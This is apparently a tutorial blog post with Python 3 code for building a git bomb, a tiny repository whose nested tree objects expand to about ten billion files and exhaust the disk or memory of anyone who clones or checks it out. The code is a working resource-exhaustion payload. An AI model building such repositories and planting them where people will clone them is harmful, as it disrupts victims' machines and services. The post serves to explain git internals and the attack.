Note: This is all Python 3 code. Other versions of Python may handle subprocesses and bytearrays differently.
A Git bomb is a compact repository that expands to consume an enormous amount of disk space and memory. Read more about them in the original git bomb post. This post walks through the code to create one; a full script is available in the Git Bomb Readme.
The basic outline:
depth = 10 # how many layers deep
width = 10 # how many files or folders per depth level
blob_body = b'one laugh' # content of blob at bottom
# Create base blob
blob_hash = write_git_object(blob_body, type='blob')
# Dirs is an array of (name, hash) pairs
dirs = [('f' + str(i), blob_hash) for i in range(width)]
file_permission = '100644'
# Write tree object containing the blob `width` times
tree_hash = write_git_object(create_tree(dirs, file_permission), type='tree')
# Make layers of tree objects using the previous tree object
# Each tree contains the last tree `width` times
for _ in range(depth - 1):
    # again dirs is an array of (name, hash) pairs
    dirs = [('d' + str(i), tree_hash) for i in range(width)]
    tree_permission = '40000' # trees and blobs need different permissions
    tree_hash = write_git_object(create_tree(dirs, tree_permission), type='tree')
# Create a commit pointing at our topmost tree
commit_hash = write_git_commit(tree_hash)
# Update master ref to point to new commit
with open('.git/refs/heads/master', 'wb') as ref_file:
    ref_file.write(commit_hash)
The bodies of write_git_object and write_git_commit simply call the appropriate git commands (git hash-object and git commit-tree). There is nothing magic about those commands; you can achieve the same thing using hashlib and zlib if you want to learn more about git internals.
import subprocess
import tempfile

def write_git_object(object_body, type='tree'):
    '''Writes a git object and returns the hash (as bytes)'''
    with tempfile.NamedTemporaryFile() as f:
        f.write(object_body)
        f.flush()  # make sure git sees the full body on disk
        command = ['git', 'hash-object', '-w', '-t', type, f.name]
        return subprocess.check_output(command).strip()

def write_git_commit(tree_hash, commit_message='Create a git bomb'):
    '''Writes a git commit and returns the hash (as bytes)'''
    command = ['git', 'commit-tree', '-m', commit_message, tree_hash]
    return subprocess.check_output(command).strip()
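For the hashlib and zlib route, here is a minimal sketch of what writing a loose object by hand might look like. It assumes a repository using the default SHA-1 object format, and the names hash_git_object and write_loose_object are hypothetical helpers for illustration, not part of the full script. Unlike write_git_object above, it returns the hash as a str rather than bytes.

```python
import hashlib
import os
import zlib


def hash_git_object(body, obj_type='blob'):
    """Return (hex_hash, store) where store is the header plus the body."""
    # Git hashes "<type> <size>\0<body>", not the body alone
    header = obj_type.encode('ascii') + b' ' + str(len(body)).encode('ascii') + b'\x00'
    store = header + body
    return hashlib.sha1(store).hexdigest(), store


def write_loose_object(body, obj_type='blob', git_dir='.git'):
    """Hypothetical stand-in for `git hash-object -w`; returns the hex hash."""
    hex_hash, store = hash_git_object(body, obj_type)
    # Loose objects live at objects/<first 2 hex chars>/<remaining 38>
    obj_dir = os.path.join(git_dir, 'objects', hex_hash[:2])
    os.makedirs(obj_dir, exist_ok=True)
    path = os.path.join(obj_dir, hex_hash[2:])
    if not os.path.exists(path):
        with open(path, 'wb') as f:
            f.write(zlib.compress(store))
    return hex_hash
```

If this works as intended, running git cat-file -p on the returned hash inside the repository should print the original body back.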
create_tree makes a valid tree object. Git tree objects are quite simple: they are a concatenated list of {permission} {sub-tree or blob name}\x00{sub-tree or blob hash as binary} entries.
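import binascii

def create_tree(dirs, perm):
    '''Builds the body of a tree object from (name, hash) pairs'''
    body = b''
    # Entries are written in name order
    for a_dir in sorted(dirs, key=lambda x: x[0]):
        body += bytearray(perm, 'ascii') + b'\x20' + bytearray(a_dir[0], 'ascii')
        body += b'\x00' + binascii.unhexlify(a_dir[1])
    return body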
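To check that a tree body has the layout described above, it can help to read one back. The following is a rough sketch of the inverse operation, assuming 20-byte SHA-1 hashes and ASCII names; parse_tree is a hypothetical helper, not something from the full script.

```python
import binascii


def parse_tree(body):
    """Split a raw tree body into (mode, name, hex_hash) tuples."""
    entries = []
    pos = 0
    while pos < len(body):
        space = body.index(b' ', pos)      # end of the permission field
        nul = body.index(b'\x00', space)   # end of the name
        mode = body[pos:space].decode('ascii')
        name = body[space + 1:nul].decode('ascii')
        raw_hash = body[nul + 1:nul + 21]  # assumes 20 raw SHA-1 bytes
        entries.append((mode, name, binascii.hexlify(raw_hash).decode('ascii')))
        pos = nul + 21
    return entries
```

Feeding it the output of create_tree should give back the same names and hashes, in sorted order, each paired with the permission that was passed in.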
That’s it! Different parameters for depth and width will produce bombs with different properties. I chose 10 for both in my original post to be similar to the “billion laughs” XML bomb. Choosing very high values for depth (around 10,000 on my machine) will cause git to segfault after running out of stack space.
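To get a feel for how depth and width trade off, here is a back-of-the-envelope sketch of the arithmetic implied by the outline above. bomb_stats is a hypothetical helper, and the numbers cover only the logical file tree, not what git actually allocates while walking it.

```python
def bomb_stats(depth, width, blob_size):
    """Estimate stored vs. expanded size for the layout in the outline."""
    return {
        # one blob, `depth` tree objects, one commit
        'unique_objects': depth + 2,
        # every tree layer multiplies the number of paths by `width`
        'expanded_files': width ** depth,
        # directories at each level, counting the root as level 0
        'expanded_dirs': sum(width ** k for k in range(depth)),
        'expanded_bytes': blob_size * width ** depth,
    }


stats = bomb_stats(depth=10, width=10, blob_size=len(b'one laugh'))
print(stats)
```

With depth and width both set to 10, a dozen stored objects describe 10**10 files, which is why the repository stays tiny while the expanded tree does not.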